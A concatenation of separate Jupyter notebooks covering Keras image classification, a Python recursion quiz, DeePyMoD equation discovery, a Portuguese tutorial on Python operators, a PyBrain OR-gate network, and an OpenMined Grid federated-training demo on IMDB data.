convolution speed is too slow, but the train accuracy is high Find the best epochs number Finally we get two models, one is 32*32 with 4 convolution filters and adam as optimizer The other is 64*64 with 8 convolution filters and RMSprop as optimizer We use the 4 epochs before. In fact we don't know the best number of epochs so we set 50 epochs to see the tendency of the train accuracy. ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train=labels X_valid = X_train[:5000,:,:,:] Y_valid = Y_train[:5000] X_train = X_train[5001:25000,:,:,:] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) #model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) #model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(1, 1))) #model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) #model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 80, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown ![accuracy](accuracy.png) So we think this model's best epochs number should be 30 ###Code model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 30, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The train accuracy is 0.97 and the test accuracy is 0.73 ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 64 COLS = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1,3,64,64) test = test.reshape(-1,3,64,64) X_train = train.astype('float64') X_test = test.astype('float64') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) sns.countplot(labels) plt.title('Cats and Dogs') optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() history = model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 80, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown ![accuracy](accuracy2.png) We think the best number should be around 24 ###Code history = model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 24, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` '
phython paper.ipynb
###Markdown Q1Write a Python program to calculate the sum of a list of numbers using recursive function. For any given list like [2, 4, 5, 6, 7] and recursive function i.e. def list_sum(num_List), which one of following options related to the code will be correct? ###Code def listsum(numlist): if len(numlist)==1: return numlist[0] else: return numlist[0]+listsum(numlist[1:]) print(listsum([2,4,5,6,7])) ###Output 24 ###Markdown Q2Write a Python program to calculate the value of 'a' to the power 'b' using recursion. Suppose the recursive function has been defined as: def power(a, b), where a is the base and b is the exponent. Then which of the following options cannot be true ###Code def power(a,b): if b==0: return 1 elif b==1: return a else: return(a*power(a,b-1)) a=4 b=2 print(power(a,b)) ###Output 16 ###Markdown Q3 Write a Python program to count repeated characters in a string. State whether the dictionary might be helpful in this case or notitalicized text ###Code import collections str1="hhfgffgfgcgchcdfdtd" d=collections.defaultdict(int) for c in str1: d[c]+=1 for c in sorted(d,key=d.get,reverse= True): if d[c]>1: print("%s%d"%(c,d[c])) ###Output f5 g4 h3 c3 d3 ###Markdown Q4Write a Python program to find intersection of two given arrays using Lambda. Which of the followings will be the correct interpretation of lambda expression? Note here array_nums1 and array_nums2 are two input arrays.**bold text** ###Code num1=[2,4,6,7] num2=[1,2,3] print("orignalarrays:") print(num1) print(num2) result=list(filter(lambda x:x in num1,num2)) print("\n intersection of the array:",result) ###Output orignalarrays: [2, 4, 6, 7] [1, 2, 3] intersection of the array: [2] ###Markdown Q5Write a Python program to add two given lists and find the difference between lists. Use map() function. which of the following would be the correct function definition? * ###Code num1=[1,2,3,4,5] num2=[2,4,5,6] print("list:") print(num1) print(num2) result=map(lambda x,y:x+y,num1,num2) print(list(result)) ###Output list: [1, 2, 3, 4, 5] [2, 4, 5, 6] [3, 6, 8, 10] ###Markdown Q6Write a recursive Python Program to copy one String to another. Which of the following can be the base condition.**bold text** ###Code def copy_string(str,str1,i): str1[i]=str[i] if(str[i]=='\0'): return copy_string(str,str1,i+1) str=input("enter the string") str+='\0' str1=[0]*(len(str)) copy_string(str,str1,0) print("copy string is:","".join(str1)) ###Output enter the stringharsh copy string is: harsh
examples/Example_new_deepmod.ipynb
###Markdown In this notebook we show how to use the new deepymod code and phimal utilities to load data and perform data analysis: ###Code import numpy as np import pandas as pd import torch from DeePyMoD_SBL.deepymod_torch.library_functions import library_1D_in from DeePyMoD_SBL.deepymod_torch.DeepMod import DeepModDynamic from DeePyMoD_SBL.deepymod_torch.training import train_dynamic from sklearn.linear_model import LassoLarsIC from phimal_utilities.data import Dataset from phimal_utilities.data.burgers import BurgersDelta from phimal_utilities.analysis import load_tensorboard if torch.cuda.is_available(): torch.set_default_tensor_type('torch.cuda.FloatTensor') import seaborn as sns import matplotlib.pyplot as plt plt.style.use('ggplot') %load_ext autoreload %autoreload 2 ###Output The autoreload extension is already loaded. To reload it, use: %reload_ext autoreload ###Markdown Making data ###Code x = np.linspace(-3, 4, 100) t = np.linspace(0.5, 5.0, 50) x_grid, t_grid = np.meshgrid(x, t, indexing='ij') ###Output _____no_output_____ ###Markdown Create a dataset by giving your solution to the object and its parameters (make sure they're named) ###Code dataset = Dataset(BurgersDelta, v=0.1, A=1.0) ###Output _____no_output_____ ###Markdown We can easily generate a solution given our grid: ###Code u = dataset.generate_solution(x_grid, t_grid) frame = 10 plt.plot(x, u[:, frame - 10]) plt.plot(x, u[:, frame]) plt.plot(x, u[:, frame + 10]) ###Output _____no_output_____ ###Markdown Or check if our solution is correct using the library: ###Code theta = dataset.library(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1)) dt = dataset.time_deriv(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1)) np.linalg.lstsq(theta, dt, rcond=None)[0] ###Output _____no_output_____ ###Markdown We can also automatically create input data for deepmod. To confirm we add noise, we use all samples (set n_samples=0 for all) and turn of randomization: ###Code X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=0, noise=0.1, random=False) u_noisy = y_train.reshape(x_grid.shape).cpu().detach().numpy() frame = 10 plt.plot(x, u[:, frame], label='True') plt.plot(x, u_noisy[:, frame], label='Noisy') plt.legend() ###Output _____no_output_____ ###Markdown Now let's generate a real dataset: ###Code X_train, y_train = dataset.create_dataset(x_grid.reshape(-1, 1), t_grid.reshape(-1, 1), n_samples=2000, noise=0.1, random=True) ###Output _____no_output_____ ###Markdown Running deepmod Now we show how to use the new deepmod. We first define which sparsity estimator we want to use. All estimators from scikitlearn are fine. set fit_intercept to false as that term is in our model. ###Code estimator = LassoLarsIC(fit_intercept=False) ###Output _____no_output_____ ###Markdown Then we define the config and build the model as always: ###Code config = {'n_in': 2, 'hidden_dims': [30, 30, 30, 30, 30], 'n_out': 1, 'library_function':library_1D_in, 'library_args':{'poly_order':2, 'diff_order': 2}, 'sparsity_estimator': estimator} model = DeepModDynamic(**config) #In the future, I want to change the api so that we would do the following: ''' function_approximator = network(n_in=2, hidden_dims=[30, 30, 30, 30, 30], n_out=1) library = Library(function=library_1D_in, poly_order=2, deriv_order=2) sparse_estimator = Estimator(fit_intercept=False) model = DeepMoD(function_approximator, library, sparse_estimator) ''' # main reason is not to get a massive config dictionary which is not very clear. This would also be super flexible. ###Output _____no_output_____ ###Markdown Define the optimizer: ###Code optimizer = torch.optim.Adam(model.network_parameters(), betas=(0.99, 0.999), amsgrad=True) ###Output _____no_output_____ ###Markdown And train for 15k:. We start the sparsity update after 5000 iterations so we have a good estimate of the data and update it every 200 iterations after: ###Code train_dynamic(model, X_train, y_train, optimizer, 15000, loss_func_args={'start_sparsity_update': 5000, 'sparsity_update_period': 200}) ###Output | Iteration | Progress | Time remaining | Cost | MSE | Reg | L1 | 15000 100.00% 0s 3.44e-04 3.41e-04 2.66e-06 0.00e+00 ###Markdown We get the following coefficients from the sparsity model (which are biased by the l1): ###Code model.sparsity_estimator.coef_ ###Output _____no_output_____ ###Markdown The unbiased coefficients we get from the network by: ###Code model.constraints.coeff_vector ###Output _____no_output_____ ###Markdown It has one extra term, but its super small. Thats an issue for next time. This is done with 10% noise. Analysing To analyse more in depth, we can load the tensorboard file: ###Code # right now works with file path, will change to experiment_ID df = load_tensorboard('runs/Apr22_16-06-14_4b6076e78386/') df.head(5) ###Output _____no_output_____ ###Markdown All the keys are: ###Code df.keys() ###Output _____no_output_____ ###Markdown We plot the losses: ###Code plt.figure(figsize=(20, 5)) plt.subplot(131) plt.semilogy(df.index, df['Total_loss'], label='Total') plt.semilogy(df.index, df['MSE_0'], label='MSE') plt.semilogy(df.index, df['Regression_0'], label='PI') plt.title('All losses') plt.legend() plt.subplot(132) plt.semilogy(df.index, df['MSE_0'], label='MSE') plt.title('MSE') plt.subplot(133) plt.semilogy(df.index, df['Regression_0'], label='PI') plt.title('Regression') ###Output _____no_output_____ ###Markdown Now let's look at the coefficients: ###Code coeff_keys = [key for key in df.keys() if key[:5]=='coeff'] scaled_coeff_keys = [key for key in df.keys() if key[:6]=='scaled'] for key in coeff_keys: plt.plot(df[key], label=f'{key[-1]}') plt.legend() plt.ylim([-1.5, 0.5]) plt.title('Coefficients') for key in scaled_coeff_keys: plt.plot(df[key], label=f'{key[-1]}') plt.legend() plt.ylim([-1.5, 1]) plt.title('Scaled coefficients') ###Output _____no_output_____ ###Markdown So we do see a few kinks but not many and certainly with minimal effect. We can also check when terms in are the model: ###Code in_model = [] for key in scaled_coeff_keys: in_model.append(df[key].to_numpy()[:, None]) in_model = np.concatenate(in_model, axis=1) in_model[np.abs(in_model) > 0 ]= 1 sns.heatmap(in_model) plt.title('Heatmap of coefficients in model') ###Output _____no_output_____
python-language/Operadores.ipynb
###Markdown > **Autor:** Érick Barbosa de Souza>> **Home:** https://abre.ai/ebsouza-pagina>> **Instagram:** @erickbsouza--- **Operadores**São símbolos especiais que tem um significado próprio para a linguagem e estão associados a determinadas operações. Na linguagem Python existem, por exemplo, operadores aritméticos, lógicos, de comparação, atribuição, etc.Todo operador necessita de pelo menos um operando. Por exemplo, a expressão 'a + b' contém um operador(+) e dois operandos('a' e 'b'). Outro exemplo é a expressão 'not a', que possui apenas um operador(not) e um operando(a). **Operadores aritméticos**Realizam operações matemáticas entre dois valores do tipo numérico. | Operador | Significado | Exemplo || :--- | :----: | ---: || + | Soma dois valores | a + b || - | Subtrai dois valores | a - b || * | Multiplica dois valores | a * b || / | Divide o valor da esquerda pelo da direita | a / b || // | Resultado como valor inteiro da divisão pelo operador '/' | a // b || % | Resto da divisão da operação 'a / b' | a % b || ** | Eleva 'a' a potencia de 'b' | a ** b | ###Code #Exemplos a = 22 b = 4 # Output: a + b = 26 print('a + b =',a+b) # Output: a - b = 18 print('a - b =',a-b) # Output: a * b = 88 print('a * b =',a*b) # Output: a / b = 5.5 print('a / b =',a/b) # Output: a // b = 5 print('a // b =',a//b) # Output: a % b = 2 print('a % b =',a%b) # Output: a ** b = 234256 print('a ** b =',a**b) ###Output a + b = 26 a - b = 18 a * b = 88 a / b = 5.5 a // b = 5 a % b = 2 a ** b = 234256 ###Markdown **Operadores de comparação**Realizam comparações entre dois valores e o resultado da operação é um valor do tipo lógico. | Operador | Significado | Exemplo || :--- | :----: | ---: || > | 'a' maior que 'b' | a > b || < | 'a' menor que 'b' | a < b || == | 'a' igual a 'b' | a == b || != | 'a' diferente de 'b' | a != b || >= | 'a' maior OU igual a 'b' | a >= b || <= | 'a' menor OU igual a 'b' | a <= b | ###Code a = 15 b = 28 # Output: a > b is False print('a > b is',a>b) # Output: a < b is True print('a < b is',a<b) # Output: a == b is False print('a == b is',a==b) # Output: a != b is True print('a != b is',a!=b) # Output: a >= b is False print('a >= b is',a>=b) # Output: a <= b is True print('a <= b is',a<=b) ###Output a > b is False a < b is True a == b is False a != b is True a >= b is False a <= b is True ###Markdown Em Python também é possível realizar operadores de comparação em cadeia. ###Code x = 28 # Output: 10 < x < 20 is False print('10 < x < 20 is', 10<x<20) # Output: 20 < b < 30 is True print('20 < x < 30 is', 20<x<30) ###Output 10 < x < 20 is False 20 < x < 30 is True ###Markdown **Operadores lógicos**Estes operadores tem valores lógicos como operandos. | Operador | Significado | Exemplo || :--- | :----: | ---: || and | Verdadeiro se 'a' E 'b' são verdadeiros | a and b || or | Verdadeiro se 'a' OU 'b' são verdadeiros | a or b || not | Inversão do valor lógico | not a | ###Code a = True b = False print('a and b is',a and b) # Conjunção(AND) entre 'a' e 'b' print('a or b is',a or b) # Disjunção(OR) entre 'a' e 'b' print('not a is',not a) # Negação(NOT) de 'a' ###Output a and b is False a or b is True not a is False ###Markdown **Operadores Bitwise**Estes operadores atuam diretamente sobre os bits dos valores operados. Por exemplo, a operação 'a & b' resulta num valor cujo os bits são resultados da conjunção dos respectivos bits de 'a' e 'b' na mesma posição.> **a** = 10 (0000 1010)>> **b** = 4 (0000 0100)> > **a** **&** **b** = 0 (0000 0000) ###Code a = 10 # (0000 1010) b = 4 # (0000 0100) print(f"a & b = {a & b} (0000 0000)" ) # Conjunção(AND) entre bits print(f"a | b = {a | b} (0000 1110)" ) # Disjunção(OR) entre bits print(f"~a = {~a} (1111 0101)" ) # Negação(NOT) de cada bit print(f"a ^ b = {a ^ b} (0000 1110)" ) # Ou exclusivo(XOR) entre bits print(f"a >> 2 = {a >> 2} (0000 0010)" ) # Shift a direita, 2 neste exemplo print(f"a << 2 = {a << 2} (0010 1000)" ) # Shift a esquerda, 2 neste exemplo ###Output a & b = 0 (0000 0000) a | b = 14 (0000 1110) ~a = -11 (1111 0101) a ^ b = 14 (0000 1110) a >> 2 = 2 (0000 0010) a << 2 = 40 (0010 1000) ###Markdown **Operadores de atribuíção**O operador atribuição(=) pode ser combinado com outros operadores. Isso agiliza bastante a escrita de um código. Afinal, escrever x += 3 é bem mais rápido que x = x + 3 não é mesmo? Confira outros exemplos. ###Code print( " 'x += 3' é equivalente a 'x = x + 3' ") print( " 'x -= 3' é equivalente a 'x = x - 3' ") print( " 'x *= 3' é equivalente a 'x = x * 3' ") print(" ") print( " 'x /= 3' é equivalente a 'x = x / 3' ") print( " 'x %= 3' é equivalente a 'x = x % 3' ") print( " 'x //= 3' é equivalente a 'x = x // 3' ") print(" ") print( " 'x **= 3' é equivalente a 'x = x ** 3' ") print( " 'x &= 3' é equivalente a 'x = x & 3' ") print( " 'x |= 3' é equivalente a 'x = x | 3' ") print(" ") print( " 'x ^= 3' é equivalente a 'x = x ^ 3' ") print( " 'x >>= 3' é equivalente a 'x = x >> 3' ") print( " 'x <<= 3' é equivalente a 'x = x << 3' ") ###Output 'x += 3' é equivalente a 'x = x + 3' 'x -= 3' é equivalente a 'x = x - 3' 'x *= 3' é equivalente a 'x = x * 3' 'x /= 3' é equivalente a 'x = x / 3' 'x %= 3' é equivalente a 'x = x % 3' 'x //= 3' é equivalente a 'x = x // 3' 'x **= 3' é equivalente a 'x = x ** 3' 'x &= 3' é equivalente a 'x = x & 3' 'x |= 3' é equivalente a 'x = x | 3' 'x ^= 3' é equivalente a 'x = x ^ 3' 'x >>= 3' é equivalente a 'x = x >> 3' 'x <<= 3' é equivalente a 'x = x << 3' ###Markdown **Operadores de identidade**Similar aos operadores de comparação, estes comparam se os operandos são iguais como objetos e não apenas em conteúdo(valores).Estes operadores são ainda mais importantes quando trabalhamos com Programação Orientada a Objetos. ###Code a = 1 b = '1' # Output: a is b = False print(" a is b =", a is b) # Output: a is not b = True print(" a is not b =", a is not b) a = [1,2,3,4,5] a = ['1','2','3','4','5'] # Output: a is b = False print(" a is b =", a is b) # Output: a is not b = True print(" a is not b =", a is not b) ###Output a is b = False a is not b = True
semana07-30-10-2020/funcoes-logicas-pybrain/.ipynb_checkpoints/Rede Neural - OR-checkpoint.ipynb
###Markdown Implementando uma Função Lógica OR com Redes Neurais Criando uma rede neural via pybrain para a estrutura de condição lógica OR. ![porta-and](Imagens/or.png) ###Code # importando as funções da biblioteca pybrain do python from pybrain.tools.shortcuts import buildNetwork from pybrain.datasets import SupervisedDataSet from pybrain.supervised.trainers import BackpropTrainer from pybrain.structure.modules import SigmoidLayer from pybrain.structure.modules import LinearLayer # definindo uma rede neural com 2 neurônios na camada de entrada, 3 na camada oculta e 1 na camada de saída # usando o melhoramento 'LinearLayer' na função de ativação das camadas ocultas # usando o melhoramento 'SigmoidLayer' na função de ativação da camada de saída rede = buildNetwork(2, 3, 1, hiddenclass = LinearLayer, outclass = SigmoidLayer) # definindo uma base de dados com 2 entradas nos atributos previsores e 1 saída no atributo meta base = SupervisedDataSet(2, 1) # adicionando o primeiro dado para o treinamento da base de dados base.addSample((0,0), (0, )) # adicionando o segundo dado para o treinamento da base de dados base.addSample((0,1), (1, )) # adicionando o terceiro dado para o treinamento da base de dados base.addSample((1,0), (1, )) # adicionando o quarto dado para o treinamento da base de dados base.addSample((1,1), (1, )) # observe que os dados obedecem ao estilo da estrutura de condição lógica OR # visualizando os atributos previsores da base de treinamento print(base['input']) # visualizando os atributos meta da base de treinamento print(base['target']) # definindo o objeto de treinamento para a base de dados criada # a taxa de aprendizagem será de 0.01 # o momentum será de 0.06 treinamento = BackpropTrainer(rede, dataset = base, learningrate = 0.01) # criando uma lista para plotar um gráfico para a taxa de erro do algoritmo eixoX = list() eixoY = list() # estrutura de repetição para realizar o treinamento da rede neural 30000 vezes for indice in range(1, 5000): # fazendo o treinamento com a base de dados criada erro = treinamento.train() eixoX.append(indice - 1) eixoY.append(erro) # mostra a taxa de erro a cada 1000 repetições if indice % 1000 == 0: print('Erro: {}'.format(erro)) # visualizando a capacidade de predição do algoritmo print(rede.activate([0, 0])) # saída esperada: próximo de 0 print(rede.activate([1, 0])) # saída esperada: próximo de 1 print(rede.activate([0, 1])) # saída esperada: próximo de 1 print(rede.activate([1, 1])) # saída esperada: próximo de 0 # importando a biblioteca de funções matplotlib do Python import matplotlib.pyplot as plt # definindo as dimensões do gráfico plt.figure(figsize = (10,5)) # plotando o gráfico da taxa de erro durante cada treinamento plt.plot(eixoX, eixoY, color = "Red", label = "Gráfico da taxa de erro após cada etapa do treinamento") # plotando o título do gráfico plt.title("Taxa de Erro do algoritmo") # adicionando uma grade ao gráfico plt.grid(True) # removendo a moldura do gráfico plt.box(False) # adicionando as legendas do gráfico plt.legend() # adicionando uma legenda ao eixo x plt.xlabel("Treinamento") # adicionando uma legenda ao eixo y plt.ylabel("Erro") ###Output _____no_output_____
notebooks/experimental/Client Worker Tree.ipynb
###Markdown IMDB FastText ExampleAdopter for Grid from https://raw.githubusercontent.com/keras-team/keras/master/examples/imdb_fasttext.py ###Code from grid.clients.keras import KerasClient client = KerasClient() from __future__ import print_function import numpy as np import os from keras.preprocessing import sequence from keras.models import Sequential from keras.layers import Dense from keras.layers import Embedding from keras.layers import GlobalAveragePooling1D from keras.datasets import imdb ngram_range = 1 max_features = 20000 maxlen = 400 batch_size = 32 embedding_dims = 50 epochs = 5 model = Sequential() # we start off with an efficient embedding layer which maps # our vocab indices into embedding_dims dimensions model.add(Embedding(max_features, embedding_dims, input_length=maxlen)) # we add a GlobalAveragePooling1D, which will average the embeddings # of all words in the document model.add(GlobalAveragePooling1D()) # We project onto a single unit output layer, and squash it with a sigmoid: model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) from pathlib import Path task = 'imdb10' parent_folder = os.path.abspath('..') client.add_task(task, adapter=f'{parent_folder}/grid/adapters/imdb.py') client.add_model(task, model) # model.fit(x_train, y_train, # batch_size=batch_size, # epochs=epochs, # validation_data=(x_test, y_test)) ###Output Using TensorFlow backend. ###Markdown Worker ###Code from grid.workers.tree import GridTree worker_tree = GridTree() ###Output UPDATE: Connecting to IPFS... this can take a few seconds... SUCCESS: Connected!!! - My ID: QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod  v . ._, |_ ., `-._\/ . \ / |/_ \ _\, y | \// _\_.___\, \/ -.\|| `7-,--.`._|| / / , /' `-. `./ / |/_.' | |// Running Grid in |_ / Tree Mode |- | | =| | | --------------------/ , . \--------._ UPDATE: Querying known workers... WORKER: /p2p-circuit/ipfs/Qmaosc64H6Y29VFCFYJzJXCX9AuRp7RCsekLmajHNVEARD...SUCCESS!!! WORKER: /p2p-circuit/ipfs/QmQabt3SWuDvjse9z7GAcH2BGQv4wH8bumkd4x5oXN2obX...FAIL!!! UPDATE: Searching for IPFS nodes - 34 found overall - 1 are OpenMined workers SUCCESS: Found 1 OpenMined nodes!!!  TASKS  From Name Address listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod================================================================== QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodall parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape: (25000, 400) x_test shape: (25000, 400) Build model... QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) x_train shape:listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod (25000, 400) x_test shape: (25000, 400) Build model... QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhlisting models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape: (25000, 400) x_test shape: (25000, 400) Build model...  TASKS  From Name Address ================================================================== QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg ALREADY SUBSCRIBED TO openmined:task:add:imdb8 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models 